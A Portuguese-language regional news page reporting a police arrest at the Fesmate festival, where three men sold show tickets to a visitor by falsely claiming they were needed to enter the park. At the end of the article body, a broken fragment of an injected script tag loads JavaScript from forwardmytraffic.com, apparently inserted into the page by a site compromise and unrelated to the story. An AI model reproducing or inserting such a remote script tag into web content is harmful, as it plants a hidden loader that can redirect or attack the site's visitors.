InícioDestaqueVenda de Ingresso Falso na Fesmate

Venda de Ingresso Falso na Fesmate

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Trata-se de ocorrência de Estelionato. A equipe PM estava em policiamento ostensivo a pé na Fesmate, quando foi abordada por um homem, o qual relatou que ao chegar na festa foi abordado por três masculinos que lhe ofereceram ingresso para entrada do parque. Que cobraram 37 reais pelo ingresso.

 

A vítima contestou os suspeitos sobre o preço já que não iria entrar no show. Os autores foram incisivos ao afirmar que sem o ingresso vendido por eles não era possível entrar no Parque. A vitima comprou o ingresso e ao chegar na entrada do parque foi informado que aquele ingresso era para o show e que a entrada na festa custava cinco reais.

 

A vítima informou a guarnição que de imediato efetuou abordagem dos suspeitos, com estes foi encontrado grande quantidade de dinheiro e vários ingressos para o show. Diante dos fatos, constatado que houve meio ardiloso para ludibriar a vítima, foi dada voz de prisão e conduzidos os suspeitos até a Delegacia de Polícia Civil para providencias…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.